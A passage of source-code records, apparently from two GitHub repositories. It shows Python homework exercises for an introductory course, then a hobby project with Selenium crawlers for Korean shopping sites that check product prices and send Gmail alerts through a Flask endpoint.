\r\n\r\n\r\n\r\n#Part D\r\ndef highest_and_Lowest(metric_weather_file, year): \r\n # Write a function that tells you which year had how much average high tempt and low tempt for the available data\r\n # assume that the unit is metric\r\n # assume that all the data has the complete year for the years available (2010-2015)\r\n # assume user will put a year thats in the file\r\n # Use the metric file that you created in previous function\r\n file = open(metric_weather_file, \"r\")\r\n header = file.readline()\r\n highest = 0\r\n lowest = 0\r\n occur = 0\r\n yearsAvailable = [2010,2011,2012,2013,2014,2015]\r\n for curr_line in file:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n cityFile = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n monthDayYearList = date.split('/')\r\n \r\n if str(monthDayYearList[2]) == str(year):\r\n lowest += float(lowTemp)\r\n highest += float(highTemp)\r\n occur += 1\r\n if occur > 0:\r\n print(\"The average of the lowest temperatures of the year\",year,\"is\", round(lowest/occur, 2),\"C\", \"\\n\"\\\r\n \"and average of the highest temperatures is\", round(highest/ occur, 2),\"C\")\r\n else:\r\n print(\"THE YEAR IS NOT AVAILABLE\")\r\n\r\ndef main():\r\n print (\"Running Part A\")\r\n clean_data(\"weatherwindows.csv\", \"weather in imperial.csv\")\r\n \r\n print (\"Running Part B\")\r\n convert_data_to_metric(\"weather in imperial.csv\", \"weather in metric.csv\")\r\n \r\n print (\"Running Part C\")\r\n print_average_temps_per_month(\"San Francisco\", \"weather in imperial.csv\", \"imperial\")\r\n print_average_temps_per_month(\"New York\", \"weather in metric.csv\", \"metric\")\r\n print_average_temps_per_month(\"San Jose\", \"weather in imperial.csv\", \"imperial\")\r\n\r\n print (\"Running Part D\")\r\n highest_and_Lowest(\"weather in metric.csv\", 2011) \r\nmain()\r\n"
},
{
"alpha_fraction": 0.699857771396637,
"alphanum_fraction": 0.7233285903930664,
"avg_line_length": 36.83333206176758,
"blob_id": "3b3f9e1540f090670d043bd72837d3f538ec7fd4",
"content_id": "bc7bd6898377978826204b23e2bc091e1efd1f9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 36,
"path": "/Homework 3/hw3q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#hw 3 question 2\r\n\r\n#getting user input\r\nfirstItem = float(input(\" Enter price of first item: \"))\r\nsecondItem = float(input (\"Enter price of second item: \"))\r\ntotal = firstItem + secondItem#total before discount\r\n#comparing prices to give 50% discount\r\nif firstItem > secondItem:\r\n secondItem1 = secondItem * 0.5\r\n firstItem1 = firstItem\r\nelif secondItem > firstItem:\r\n firstItem1 = firstItem * 0.5\r\n secondItem1 = secondItem\r\nelif secondItem == firstItem:\r\n secondItem1 = secondItem * 0.5\r\n firstItem1 = firstItem\r\n#first discount total\r\ntotalWithFirstDiscount = firstItem1 + secondItem1\r\n#asking user if they are members\r\nmembership = input(\"Does customer have a club card? Enter Y/N: \")\r\n#if member apply 10% discount\r\nif membership == 'Y' or 'y':\r\n secondDiscount = totalWithFirstDiscount * 0.10\r\n totalWithSecondDiscount = totalWithFirstDiscount - secondDiscount\r\nelif membership == 'N' or 'n':\r\n totalWithSecondDiscount = totalWithFirstDiscount\r\n#asking for tax rate\r\ntaxrate = float(input(\"Enter tax rate, e.g. 5.5 for 5.5% tax: \"))\r\n#calculating tax\r\ntax = totalWithSecondDiscount * (taxrate/100)\r\n#calculating total with both discounts and tax\r\ntotalPrice = totalWithSecondDiscount + tax\r\n#printing results \r\nprint(\"Base price = \",round(total,2))\r\nprint(\"Price after discounts = \",round(totalWithSecondDiscount,2))\r\nprint(\"Total price: \", round(totalPrice,2))\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.6892430186271667,
"alphanum_fraction": 0.7031872272491455,
"avg_line_length": 31.46666717529297,
"blob_id": "72b4a3aa05f10ee0421e584d34f8643992faf8db",
"content_id": "540b6310945350c3a208000153a41e9199ad5fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/Homework 5/hw5q5a.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting user length of sequence \r\nlength = int(input(\"please enter the length of the sequence: \"))\r\n#set a variable to 0 to compare to length \r\nstart = 0\r\n#total of all numbers set to 1 for now \r\ntotal = 1\r\n#loops while start isnt equal to length \r\nwhile start != length:\r\n userNumber = int(input(\"Please enter a positive integer: \"))\r\n total = userNumber * total\r\n start += 1\r\n#calculating geometric mean \r\ngeometricMean = total**(1/length)\r\n#printing output\r\nprint(round(geometricMean,3))\r\n"
},
{
"alpha_fraction": 0.6822222471237183,
"alphanum_fraction": 0.6822222471237183,
"avg_line_length": 29.714284896850586,
"blob_id": "321e143f746f27665d95936a76cc0dbda7f2f913",
"content_id": "b8489cfa36515b31189f8e150cea33ba3c48560e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 14,
"path": "/Homework 5/hw5q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting string from user\r\nstring = input(\"Please enter a string: \")\r\n#beginning with empty string to further assign each character in \r\nemptyString = \" \"\r\n#initiate detection as true \r\ndetection = True \r\nfor character in string:\r\n if character < emptyString:\r\n detection = False \r\n emptyString = character\r\nif detection == True:\r\n print(string, \"is increasing\")\r\nif detection == False:\r\n print(string, \"is not increasing\")\r\n \r\n"
},
{
"alpha_fraction": 0.7475845217704773,
"alphanum_fraction": 0.751207709312439,
"avg_line_length": 23.090909957885742,
"blob_id": "fb16717cf25773088b75dde9639f157cf3c5eb71",
"content_id": "23da5ef1f9ff772e3d0334c008343248d8783e1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 828,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 33,
"path": "/Homework 4/hw4q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#part a \r\n\r\n#asking user to input odd length string\r\nuserString = input(\"Please enter a string of odd length: \")\r\n\r\n#getting the length of the string\r\nuserStringLength = len(userString)\r\n\r\n#dividing the string by integer division\r\nindexOfMiddleCharacter = (userStringLength // 2) \r\n\r\n#getting the index that number\r\nmiddleCharacter = userString[indexOfMiddleCharacter]\r\n#printing the output\r\n\r\nprint(\"middle character: \", middleCharacter)\r\n\r\n\r\n#part b\r\n\r\n#getting the first half of the string by splitting\r\nfirstHalf = userString[0:indexOfMiddleCharacter]\r\n\r\n#printing the output\r\nprint(\"The first half of the string: \",firstHalf)\r\n\r\n#c\r\n\r\n#getting the second half of the string by splitting\r\nsecondHalf = userString[indexOfMiddleCharacter+1:]\r\n\r\n#printing the second half \r\nprint(\"The second half of the string: \",secondHalf)\r\n"
},
{
"alpha_fraction": 0.6958855390548706,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 32.6875,
"blob_id": "e725b0e46960deb9e17fb61e833991ebd3259076",
"content_id": "a329b3ca235d3fa1227a4d1507135e77d00e01cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 559,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 16,
"path": "/Homework 2/hw2q1b.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#takes user weight and height converts and then uses BMI formula\r\n\r\noneKilogram = 0.453592 # one kilogram in a pound\r\noneMeter = 0.0254 #one meter in an inch \r\n\r\nuserPound = float(input(\"please enter weight in pounds:\")) #takes users weight in pound\r\n\r\nkilograms = userPound * oneKilogram #converts to kilogram \r\n\r\nuserInches = float(input(\"please enter height in inches:\"))#takes users height inches\r\n\r\ninches = userInches * oneMeter #converts to meters \r\n\r\nBMI = kilograms / (inches**2) #bmi formula \r\n\r\nprint(\"BMI is:\", round(BMI,7))#printing outcome\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4741035997867584,
"alphanum_fraction": 0.49800798296928406,
"avg_line_length": 16.69230842590332,
"blob_id": "a7fff44eca2acea1d839b5dcdaebcdbd0af3747f",
"content_id": "ac905dd5c1455e745f464e5ff1574ada8ea4836f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/Homework 5/hw5q8.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "userInput = int(input(\"please enter number\"))\r\n\r\nn = 0\r\nm = \"1\"\r\nnum = 1\r\nspace = ' '\r\nwhile n != userInput:\r\n line = space* (userInput-n) + m\r\n nextNumber = num + 1\r\n num += 1 \r\n m += str(nextNumber)\r\n n += 1\r\n print(line)\r\n \r\n\r\n"
}
] | 36 |
ggm1207/Observer_KR
|
https://github.com/ggm1207/Observer_KR
|
81d7388e3f440bf64dd45aad6f05407a0ef2add1
|
260bac13cf14938b8e7e81e4c35287da67f50b4b
|
e73ecd8e865593743210e174b7f109ce39492ce0
|
refs/heads/master
| 2022-12-18T22:48:14.122686 | 2020-09-22T05:44:00 | 2020-09-22T05:44:00 | 270,396,048 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6472346782684326,
"alphanum_fraction": 0.6786248087882996,
"avg_line_length": 26.875,
"blob_id": "1c05faad8805f2b9ece7907e480e5d703ec7665a",
"content_id": "addcbcc3858dbf8487682d2ec87eb40ba3e3a3b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/README.md",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "# Observer_KR\n\n닌텐도 스위치를 사기 위해 시작했던 프로젝트이지만 당근마켓에서 이미 구했으므로 기존 구현에서 더욱 확장해서 사고싶은 물건을 원하는 가격대에 구매할 수 있게 감시해주는 \n\n## Idea\n\n- 키워드와 금액대로 내가 원하는 물건을 어느 정도 특정지을 수 있지 않을까\n - ex ) 닌텐도 스위치, 340,000 ~ 380,000 원\n - 원하는 물건이 선택이 안 될 수도 있음.\n- 사용자가 직접 입력한 URL을 감시하면서 사용자에게 금액 변화를 KakaoTalk, SMS, Email 을 통해 전송\n - 원하는 물건은 선택 되나 금액 변화( 할인 )가 없을 수도 있음. # 사용자로 하여금 의심하게 만듬.\n- 구매또한 가능할 것 같아서 집어넣을려 했으나 원하는 물건을 특정짓는게 완벽히 되지 않기 때문에 혹여나 어떠한 불상사가 일어날 수도 있으니 제한.\n\n\n## Architecture\n\n언제든지 수정 될 수 있습니다. ( 2020.06.14 )\n\n\n\n## 현재 상황\n\n원하는 기능은 구현을 했지만.. 잘 짠 코드라고 생각하지 않았습니다. 문제점 파악 후 현재는 Python 클린 코드 책을 산 후 공부중에 있습니다.\n그리고 현실적으로 내가 지금 당장 해야 되는 것들을 공부하고 있습니다.\n"
},
{
"alpha_fraction": 0.5858352780342102,
"alphanum_fraction": 0.5896843671798706,
"avg_line_length": 22.178571701049805,
"blob_id": "624b3059bcbb26bf0bacfb7504ce9820b0642c6a",
"content_id": "76fe4dc1ec97f4c7ed53f471373a2385daff6776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1299,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 56,
"path": "/utils.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import logging\nfrom urllib import parse\nfrom collections import defaultdict\n\n\nfrom rich.logging import RichHandler\nfrom rich.traceback import install\n\ninstall()\n\nFORMAT = \"%(message)s\"\nlogging.basicConfig(\n level=logging.INFO, format=FORMAT, datefmt=\"[%Y-%m-%d %X]\",\n handlers=[RichHandler()]\n )\n\nlog = logging.getLogger(\"rich\")\n\ndef getLogger():\n global log\n return log\n\n\ndef parsingFile(fpath):\n parser = {}\n dup_check = defaultdict(int)\n\n for line in open(fpath, 'r'):\n line = line.rstrip('\\n')\n if line == '': continue\n if line.startswith('['):\n section = line[1:-1]\n if section == 'product':\n dup_check[section] += 1\n section = section + str(dup_check[section])\n parser[section] = {}\n continue\n if line.startswith('#'):\n continue\n key, value = line.split('=') \n parser[section][key] = int(value) if value.isdecimal() else value\n return parser\n\ndef grouped(iterable, n):\n return zip(*[iter(iterable)]*n)\n\ndef tm2int(text):\n return int(text.replace(',',''))\n\ndef hangul2url(text):\n return parse.quote(text)\n\n\nif __name__ == \"__main__\":\n print(parsingFile('./config/product'))\n print(parsingFile('./config/login'))\n\n"
},
{
"alpha_fraction": 0.5480226278305054,
"alphanum_fraction": 0.5511613488197327,
"avg_line_length": 28.481481552124023,
"blob_id": "d079a70dfe047de547da54a1390622493270f24f",
"content_id": "0e7d73458078cbbdf75020670140c5bef534617a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1593,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 54,
"path": "/eventlistener/apis/gmail.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport smtplib\nfrom email.mime.text import MIMEText\n\nabs_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(abs_dir, '..', '..'))\n\nfrom .base import BaseApi\nfrom utils import parsingFile\n\nclass Gmail(BaseApi):\n def __init__(self):\n super().__init__(\"google\")\n print('Gmail Init')\n self.msg_keyword = \"Observer: {}\\nProduct Num: {}\\n\"\n\n def login(self):\n self.GMAIL_ID = self.api_login['google']['id']\n self.GMAIL_PWD = self.api_login['google']['pw']\n\n try:\n self.smtp = smtplib.SMTP('smtp.gmail.com', 587)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(self.GMAIL_ID, self.GMAIL_PWD)\n except:\n self.__del__()\n\n def _parsing_keyword(self, datas):\n msg = \"\"\n for link, products in datas['links'].items():\n msg += '*' * 30 + '\\n'\n msg += 'Link:{}\\n'.format(link)\n for title, price in products.items():\n msg += '{} {}\\n'.format(title, price)\n msg += '\\n'\n\n self.msg_keyword = self.msg_keyword.format(datas['name'], datas['lens'])\n self.msg_keyword += msg\n\n self.send_gmail(self.msg_keyword)\n\n def _parsing_url(self, datas):\n pass\n\n def send_gmail(self, msg):\n email = self.GMAIL_ID + \"@gmail.com\"\n mimetext = MIMEText(msg)\n mimetext['Subject'] = \"Observer Notification\"\n mimetext['To'] = email\n self.smtp.sendmail(email, \"[email protected]\", mimetext.as_string())\n\n self.smtp.quit()\n\n"
},
{
"alpha_fraction": 0.481189101934433,
"alphanum_fraction": 0.4894188642501831,
"avg_line_length": 34.44047546386719,
"blob_id": "d5dc9505a3b23435ae0361ef1f598147342912ec",
"content_id": "54b93fca42ac813480ec6d8f421c620f81b1ee10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6114,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 168,
"path": "/observers/tmon.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\n\nfrom selenium.common.exceptions import NoSuchElementException\n\nsys.path.append('..')\nfrom utils import tm2int, hangul2url\nfrom base import BaseCralwer, tryfindelements\nfrom urls import TMON_LOGIN_URL, TMON_SEARCH_URL\n\nclass Tmon(BaseCralwer):\n def __init__(self): # init, login, delete alert\n super().__init__()\n self.log.info(\"TMON Observer Starting...\")\n self.links = []\n\n def login(self):\n self.log.info(\"TMON Observer Login...\")\n key = self.login_key['tmon']\n self.get(TMON_LOGIN_URL)\n self.findE_id('userid').send_keys(key['id'])\n self.findE_id('pwd').send_keys(key['pw'])\n self.findE_lt('로그인').click()\n self.get('http://search.tmon.co.kr') \n\n # 오늘 하루 보지 않기, 1번 클릭하면 모든 팝업 다 지워짐\n expires = None\n try:\n expires = self.findE_cn(\"expires\")\n expires.click()\n except:\n self.log.info(\"TMON Observer doesn't click expires.\")\n\n\n def search_products(self, prod):\n self.log.info(\"TMON Observer Searching Products...\")\n\n scrolls = 0\n self.get(TMON_SEARCH_URL.format(hangul2url(prod['keyword'])))\n\n self.scrollsTo(200000)\n\n self.links = [] # flush\n\n links = self.findEs_cs('section > div > ul > div > div > li > a')\n prices = self.findEs_cs('span.price > span.sale > i')\n low_limit = prod['low_price'] // 2\n \n for link, price in zip(links, prices):\n price = tm2int(price.text)\n\n # 상품의 최소 가격이 제시값을 넘는 경우\n if price > prod['high_price']:\n continue\n \n # 상품의 최소 가격이 너무 낮은 경우: 안에 있는 상품들이 사용자의 요구를 충족하지 못할거라고 가정\n if price < low_limit:\n continue\n self.links.append(link.get_attribute('href'))\n\n def check_products(self, prod):\n self.log.info(\"TMON Observer Checking Products...\")\n datas = {\n 'type': 'keyword',\n 'name': 'Tmon'\n }\n idx = 0\n for link in self.links:\n sub_titles, sub_prices = self.check_tmon_product(link, prod)\n if not sub_titles:\n continue\n datas['link' + str(idx)] = link + '\\n' + \\\n '\\n'.join([title + '\\n' + str(price) for title, price in zip(sub_titles, sub_prices)])\n idx += 1\n datas['lens'] = idx\n\n if idx:\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n def check_tmon_product(self, link, prod):\n self.log.info(\"TMON Observer Checking Urls:{}\".format(link))\n\n self.get(link)\n\n o_cssSelector = '#_optionScroll > div > div > div > div.dep-sel.dep{} > ul > li'\n options = self.findEs_cn(\"dep-sel\")\n o_len = len(options) // 2\n\n if o_len == 0:\n product = self.findE_cs(\"ul.prod > li > span.tit\").text\n price = self.findE_cs(\"div.price_area > div > div > span > strong\").text\n price = tm2int(price)\n if prod['low_price'] <= price <= prod['high_price']:\n return [product], [price] \n return [], []\n\n o_cIdx = 0\n o_sList = [0 for _ in range(o_len)]\n options = options[:o_len]\n o_maxList = [len(self.findEs_cs(o_cssSelector.format(0)))//2]\n\n # start\n options[0].click()\n\n products, prices = [], []\n\n while True:\n # product choiced\n if o_cIdx == o_len:\n product_price, product_title = None, None\n \n while not (product_price and product_title):\n try:\n product_price = self.findE_cs('div.price_area > div > div > span > strong')\n product_title = self.findE_xp('//*[@id=\"_optionScroll\"]/div/ul[1]/li/span[1]')\n product_price = tm2int(product_price.text) \n except NoSuchElementException:\n self.log.warning(\"NoSuchElementException:product_price,product_title\")\n last_option = None\n while not last_option:\n try:\n options[o_cIdx-1].click()\n last_option = self.findEs_cs(o_cssSelector.format( \\\n o_cIdx-1))[o_sList[o_cIdx-1]-1]\n last_option.click()\n except NoSuchElementException:\n self.log.warning(\"NoSuchElementException:last_option\")\n if prod['low_price'] <= product_price <= prod['high_price']:\n products.append(product_title.text)\n prices.append(product_price)\n\n o_cIdx -= 1\n self.findE_cn(\"del\").click()\n options[o_cIdx].click()\n continue\n \n # option add maxlen\n if o_sList[o_cIdx] == 0 and o_cIdx != 0:\n o_maxList.append(len(self.findEs_cs(o_cssSelector.format(o_cIdx)))//2)\n \n # option arrived maxlen\n if o_sList[o_cIdx] == o_maxList[o_cIdx]:\n o_sList[o_cIdx] = 0\n o_cIdx -= 1\n options[o_cIdx].click()\n o_maxList.pop()\n if o_maxList:\n continue\n break\n \n with tryfindelements(self.findEs_cs, o_cssSelector.format(o_cIdx)) as n_option:\n n_option = n_option[o_sList[o_cIdx]] \n o_sList[o_cIdx] += 1 # option:n plus\n\n if n_option.get_attribute(\"class\") == \"soldout\":\n continue\n n_option.click()\n o_cIdx += 1 # options: n to n+1\n\n return products, prices\n \n \n def check_urls(self):\n pass\n \n\nif __name__ == \"__main__\":\n a = Tmon()\n a.run()\n"
},
{
"alpha_fraction": 0.5459302067756653,
"alphanum_fraction": 0.5476744174957275,
"avg_line_length": 26.74193572998047,
"blob_id": "a418c74694fffd4618cfa9da41aa4dc34a16cfd8",
"content_id": "366effc7d23a9f3451567f41a69e279f20dd8dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1720,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 62,
"path": "/eventlistener/api.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nfrom flask import Flask\nfrom tinydb import TinyDB, Query\nfrom flask_restful import reqparse\nfrom flask_restful import Resource, Api\n\nabs_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(abs_dir, '..'))\nfrom apis.gmail import Gmail\nfrom utils import grouped\n\napp = Flask(__name__)\napi = Api(app)\n\nclass EventLister(Resource):\n def __init__(self):\n self.types = ['keyword', 'url']\n self.apis = []\n self.apis.append(Gmail())\n\n def parsing(self, parser, tp, lens):\n for idx in range(lens):\n parser.add_argument('link{}'.format(idx), type=str)\n\n args = parser.parse_args()\n links = {'links' : {}}\n for k, v in args.items():\n if not k.startswith('link'):\n continue\n link, value = v.split('\\n')[0], v.split('\\n')[1:]\n links['links'][link] = {t: p for t, p in grouped(value, 2)}\n return links\n\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('lens', type=int)\n parser.add_argument('name', type=str)\n\n args = parser.parse_args()\n\n if args['type'] not in self.types:\n return {'error': 'none type'}\n\n datas = self.parsing(parser, args['type'], args['lens']) \n datas.update(args)\n print(datas)\n for api in self.apis:\n api.parsing(datas)\n \n except Exception as e:\n print(e)\n return {'error' : str(e)}\n \n\napi.add_resource(EventLister, '/gateway')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5422848463058472,
"alphanum_fraction": 0.549332320690155,
"avg_line_length": 30.34883689880371,
"blob_id": "3d5f4d36376e0f78a4c7cef81f77b8f9c898f457",
"content_id": "e1a4f84ad4c41ee8cbb159709d8416c832d6e379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2700,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 86,
"path": "/observers/coupang.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\nfrom time import sleep\n\nfrom selenium.common.exceptions import NoSuchElementException\n\nsys.path.append('..')\nfrom utils import tm2int, hangul2url\nfrom base import BaseCralwer\nfrom urls import COUPANG_LOGIN_URL, COUPANG_SEARCH_URL\n\n\nclass Coupang(BaseCralwer):\n def __init__(self): # init, login, delete alert\n super().__init__()\n self.log.info(\"COUPANG Observer Starting...\")\n self.products = []\n\n def login(self):\n self.log.info(\"COUPANG Observer Login...\")\n self.get(COUPANG_LOGIN_URL) \n\n self.findE_id('login-email-input').send_keys(self.login_key['coupang']['id'])\n self.findE_id('login-password-input').send_keys(self.login_key['coupang']['pw'])\n self.findE_cn('login__button').click()\n\n def search_products(self, prod):\n self.log.info(\"COUPANG Observer Searching Products...\")\n self.get(COUPANG_SEARCH_URL.format(hangul2url(prod['keyword'])))\n\n pages = 10\n self.links = []\n self.titles = []\n self.prices = []\n\n while pages:\n titles = self.findEs_cs(\"a > dl > dd > div > div.name\")\n prices = self.findEs_cs(\"div.price > em > strong\")\n links = self.findEs_cs(\"form > div > div > ul > li > a\")\n for price, link, title in zip(prices, links, titles):\n price = tm2int(price.text)\n if price > prod['high_price']: continue\n if price < prod['low_price']: continue\n\n self.prices.append(price)\n self.titles.append(title.text)\n self.links.append(link.get_attribute(\"href\"))\n\n # self.findE_cn(\"btn-next\").click()\n self.findE_lt(\"다음\").click()\n\n pages -= 1\n\n def check_products(self, prod):\n self.log.info(\"COUPANG Observer Checking Products...\")\n datas = {\n 'type': 'keyword',\n 'name': 'Coupang',\n }\n\n idx = 0\n for link, title, price in zip(self.links, self.titles, self.prices):\n if not self.check_coupang_product(link):\n continue\n\n datas['link' + str(idx)] = link + '\\n' + '{} {}\\n'.format(title, price)\n idx += 1\n datas['lens'] = idx\n if idx:\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n \n\n def check_coupang_product(self, link):\n self.log.info(\"COUPANG Observer Checking Urls:{}\".format(link))\n self.get(link)\n\n if self.findE_cn(\"prod-buy-btn\") == \"\":\n return False\n return True\n \n def check_urls(self):\n pass\n\nif __name__ == \"__main__\":\n a = Coupang() # test\n a.run()\n"
},
{
"alpha_fraction": 0.5595340728759766,
"alphanum_fraction": 0.5752804279327393,
"avg_line_length": 29.5,
"blob_id": "42f7397331854241f018fc37d28f5210314192c3",
"content_id": "f8c0eba3782db7d2a209eccc1c0707497c91fc1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4698,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 152,
"path": "/observers/base.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\nimport smtplib\nimport datetime\nimport requests\nfrom time import sleep\nfrom email.mime.text import MIMEText\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\n\nsys.path.append('..')\nfrom utils import parsingFile, getLogger\n\n\nclass SMTP: \n def __init__(self):\n self.log = getLogger()\n self.user_info = parsingFile('../config/login') \n self.login()\n\n def login(self):\n GMAIL_ID = self.user_info['google']['id']\n GMAIL_PWD = self.user_info['google']['pw']\n try:\n self.smtp = smtplib.SMTP('smtp.gateway.com', 587)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(GMAIL_ID, GMAIL_PWD)\n self.log.info('SMTP Login SUCCESS')\n except:\n self.log.error('SMTP Login FAILED')\n self.__del__()\n\n def __del__(self):\n self.smtp = None\n \n def send(self, mimetext: MIMEText):\n self.smtp.sendmail(GMAIL_ID, GMAIL_ID, mimetext.as_string())\n\n\nclass tryfindelements:\n def __init__(self, method, command):\n self.temp = None\n self.method = method\n self.command = command\n\n def __enter__(self):\n try_limit = 10\n while not self.temp and try_limit:\n try:\n self.temp = self.method(self.command)\n except:\n try_limit -= 1\n return self.temp\n\n def __exit__(self, type, value, traceback):\n pass\n\n\nclass BaseCralwer:\n def __init__(self):\n self.log = getLogger()\n self._driver_access()\n self._driver_init()\n self.prod_key = parsingFile('../config/product')\n self.login_key = parsingFile('../config/login')\n\n def __del__(self):\n self.driver.quit()\n\n def login(self):\n raise NotImplementedError\n\n # 조건(low, high)에 해당하는 product 들을 반환\n def search_products(self):\n raise NotImplementedError\n\n # product가 구매 가능한지를 반환\n def check_products(self):\n raise NotImplementedError\n \n # url이 구매 가능한지를 반환\n def check_urls(self):\n raise NotImplementedError\n \n def _driver_access(self):\n try:\n op = webdriver.ChromeOptions()\n op.add_argument('headless')\n op.add_argument('window-size=1920x1080')\n # op.add_argument('disable-gpu')\n # fake headless\n op.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n prefs = {\n \"profile.managed_default_content_settings.images\": 2,\n \"disk-cache-size\": 4096\n }\n op.add_experimental_option(\"prefs\", prefs)\n self.driver = webdriver.Chrome('/home/gunmo/public/chromedriver', \n options=op)\n self.driver.implicitly_wait(1)\n self.log.info('ChromeDriver Access')\n except:\n self.log.error('ChromeDriver Access Failed')\n\n def _driver_init(self):\n self.findE_id = self.driver.find_element_by_id\n self.findE_xp = self.driver.find_element_by_xpath\n self.findE_lt = self.driver.find_element_by_link_text\n self.findE_cn = self.driver.find_element_by_class_name\n self.findE_cs = self.driver.find_element_by_css_selector\n\n self.findEs_cn = self.driver.find_elements_by_class_name\n self.findEs_cs = self.driver.find_elements_by_css_selector\n\n def get(self, url):\n cur_url = None\n while url != self.driver.current_url and cur_url != self.driver.current_url:\n self.log.info(\"Observer Trying:{}\".format(url))\n cur_url = self.driver.current_url\n self.driver.get(url)\n sleep(0.5)\n\n def scrollsTo(self, scroll_limit):\n scrolls = 0\n while scrolls < scroll_limit:\n scrolls += 10000\n self.driver.execute_script(\"window.scrollTo(0, {})\".format(scrolls))\n sleep(0.3)\n\n def send_datas(self, url, datas):\n requests.post(url, data=datas)\n\n def send_test(self):\n datas = {'type': 'keyword', 'lens': 5, 'name': 'testname'}\n for i in range(5):\n datas['link' + str(i)] = 'linkexample.com\\ntitle\\nprice\\ntitle2\\nprice2'\n \n print(datas)\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n def run(self):\n self.login()\n for prod in self.prod_key.values():\n self.search_products(prod)\n self.check_products(prod)\n\n\nif __name__ == \"__main__\":\n a = BaseCralwer()\n a.send_test()\n del a\n"
},
{
"alpha_fraction": 0.7244898080825806,
"alphanum_fraction": 0.7244898080825806,
"avg_line_length": 57.79999923706055,
"blob_id": "8526f85ffdc51c13c439a4d6db7fe5c90753857f",
"content_id": "8a6ef50b3a2ddd41001d10cec57349144cb217b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 5,
"path": "/observers/urls.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "TMON_LOGIN_URL = \"https://login.tmon.co.kr/user/loginform?return_url=\"\nTMON_SEARCH_URL = \"http://search.tmon.co.kr/search/?keyword={}&thr=ts\"\n\nCOUPANG_LOGIN_URL = \"https://login.coupang.com/login/login.pang\"\nCOUPANG_SEARCH_URL = \"https://www.coupang.com/np/search?component=&q={}&channel=user\"\n"
},
{
"alpha_fraction": 0.5634146332740784,
"alphanum_fraction": 0.5634146332740784,
"avg_line_length": 25.45161247253418,
